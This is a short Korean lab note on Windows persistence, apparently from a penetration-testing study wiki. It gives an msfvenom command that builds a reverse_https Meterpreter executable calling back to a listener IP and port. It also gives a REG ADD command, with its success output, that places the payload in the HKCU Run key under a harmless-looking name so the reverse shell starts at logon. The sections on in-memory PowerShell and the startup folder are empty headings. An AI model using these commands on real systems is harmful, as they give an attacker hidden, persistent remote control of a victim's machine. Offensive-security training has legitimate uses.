레지스트리 / 스타트업 폴더
레지스트리
실습
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v <이름> /t REG_SZ /d <프로그램-경로>레지스트리 + 온디스크 미터프리터
# 1. 미터프리터 생성
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.40.182 lport=8443 -f exe -o rev.exe
# 2. 리버스쉘을 c:\wow 에 옮기기
# 3. 타겟의 레지스트리 키 변경
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v <이름> /t REG_SZ /d <프로그램-경>
PS C:\Users\Administrator.CHOI> REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v safestartup /t REG_SZ /d C:\wow\rev.exe
The operation completed successfully.
# 4. 로그오프 후 다시 로그인 -> 리버스쉘 확인 
레지스트리 + 인메모리 파워쉘 미터프리터

스타트업 폴더
실습
레퍼런스
Last updated